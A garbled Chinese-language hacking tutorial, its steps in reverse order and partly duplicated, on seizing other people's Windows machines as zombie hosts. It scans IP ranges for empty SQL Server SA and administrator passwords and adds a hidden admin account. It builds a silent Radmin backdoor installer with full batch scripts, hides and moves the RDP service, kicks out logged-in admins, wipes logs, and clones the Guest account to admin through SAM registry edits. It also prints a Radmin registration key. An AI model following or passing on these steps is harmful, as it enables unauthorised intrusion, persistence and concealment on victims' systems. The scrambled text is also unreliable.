不要扫描国内的机啊~ 记得 我这里出不了国外,慢的只扫描一个c段IP好了。看到没有,终结。。C。IP扩充多少就要看你
发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的, 的网快还是慢。事实上\winnt。快的就扩充多点,我把它扩充了整一个网段。口令。由218.58.88.1-218.58.88.255你可以扩充成218.58.80.1- 218.58.90.255 .端口为了减少动画的大小,入侵。扫描不到国外的机的,学习c。代理我一般到网迷之家()拿的。就这个好了 做试范),winnt。代理我一般到网迷之家()拿的。SA空口令入侵到3389终结完整编CD。就这个好了 218.58.88.15 [山东省 青岛市](我的是教育网,选择10进制 修改成所希望的端口,整编。默认是3389,比如1314 先找个有不正常端口的代理,看看完整。比如1314 菜菜鸟教程之-如何提高扫描到肉鸡的机会 BY:C。网络凡人 最后送一个找固定IP肉鸡的方法: 碎片 <Radmin服务端最新配置方法> (他还有个(隐藏帐号后门教程)也差不多) 孤狼望月 <使用被禁用的帐户[Guest]登陆> mervin制作 <《终结3389》补充版> 笑语☆嫣然的《终结3389》 文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助) 整个过程全部结束..这机子就真正变成你的肉鸡了... 最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵 整个过程结束 net user mint /del 6.用Guest登陆后删除自己建的帐号 5.实验被禁止的帐户Guest是否可用. net user Guest /active:no[命令行下禁用Guest] net user Guest /active:yes net user Guest **** [修改密码] 4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下] 3.将Guest的配置(二个REG文件导进注册表) 2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行) 导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据) 然后删除Guest的配置 在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样) 找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值. 克成管理员权限的方法: 将Guest克成管理员权限 如:psu -p regedit -i 157 Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值 用法:sa。[psu -p regedit -i pid] HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 1.使用psu.exe展开注册表到 十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号 九.注消后(注消比直接关要好些)..用Radmin重启肉鸡.. sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写) CD C:\winnt copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件) CD c:\winnt\system32 再在CMD下 保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止) 第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter) 再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。\winnt。)" 编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行) 的键值为mm.reg文件. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 导出3389服务的 要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧) PortNumber值,cd。选择10进制 修改成所希望的端口,默认是3389,注册表有2个地方需要修改。学会空口。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 第二个地方:SA空口令入侵到3389终结完整编CD。 PortNumber值,注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 修改服务器端的端口设置 ,r.bat,内容为 八.改3389端口和服务名称 关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录) 按F5(运行) -------------------------------------------- exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' OBJECTPROPERTY(id, N'IsExtendedProc') = 1) dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and if exists (select * from -------------------------------------------- 复制一下代码:SELMIS -->>Windowst身位验证登陆 程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的) 七.打SA空口令补丁 c:\winnet\1.bat (删除覆盖查看当前在线用户文件) c:\winnt\log . 自己的IP .(擦PP) 六.连上后..在cmd下运行 再用c:\query user检查一便~~(这就是为什么不马上用1.bat了) c:\logoff 1(踢出去一个管理者) 运行命令 c:\query user (查看对方目前终端登陆状况。) 使用命令 telnet对方ip.直接可以登陆对方电脑了。 然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint 修改cmd的快捷方式属性为允许其他身份登陆。 找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。 我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。 telnet对方ip。发现需要NTLM 身份验证。 使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。 这里就有时会出现个问题.. 五.重启后用远程桌面远程器连上去 重启肉鸡 运行 c:\winnt\3389.exe RADMIN进入TELNET 最好再上传一个反弹后门 psu.exe 3389.exe CleanIISLog.exe.exe SC.exe query.exe quser.exe port.bat(如果是在XP下..这个要把里面的WINNT改为Windows) 上传文件到c:\WINNT(XP是windows): 四.用RADMIN客服端连接.... 生成完成 -->>确定-->>确定 缄默模式:全部隐藏 覆盖方式:覆盖所有文件 -->>摸式 安装程序:释放后运行:r.bat 释放前运行u.bat 释放路径:%systemroot%\system32 -->>常规 选择Default.sfx的自释放模块-->>高级自释放选项 7、将Rad.rar制作成自解压文件. 6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包 -------------------------------------------- @del u.bat @del r.bat @del 1.reg @del rad.exe @net start r_server @regedit /s 1.reg @Explorer.exe /install /silence @Explorer.exe /uninstall /silence @echo off @regedit /s 1.reg @Explorer.exe /install /silence @Explorer.exe /uninstall /silence @echo off -------------------------------------------- 5、写第二个批处理,并命名为u.bat -------------------------------------------- net stop r_server @echo off -------------------------------------------- 4、编写一个批处理, 3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg 设置密码-->>设置连接端口(默认4489)-->>生成 2、在本地设置服务端(一定要生成) 1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新 制作RAD.EXE过程: 三.上传后门程序RAD.EXE(RADMIN服务端自解压程序) net localgroup administrators mint /add 将帐号mint升级为管理员 net user mint mint /add 添加用户mint密码为mint net start telnet 开telnet服务 二.用SQLTOOLS连上去建一个用户 一.扫到SA弱口令..(自动攻击器) 下载(点右键用下载工具下) mstsc.exe(远程桌面连接程序) psu.exe(使用被禁止的Guest帐户要用到的) 3389.exe(开3389端口服务的) CleanIISLog.exe(小榕的擦PP程序) SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序) 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23 RADMIN注册码: RAMDIN影子3.0中文版(远程控制程序) SQLTOOLS(SA空口令连接器) 工具:WINNTAutoAttack自动攻击器(扫漏洞) (责任编辑:admin) |
 |
|
|
律师加盟热线:400-8919-913 |  |
律信通 |
|
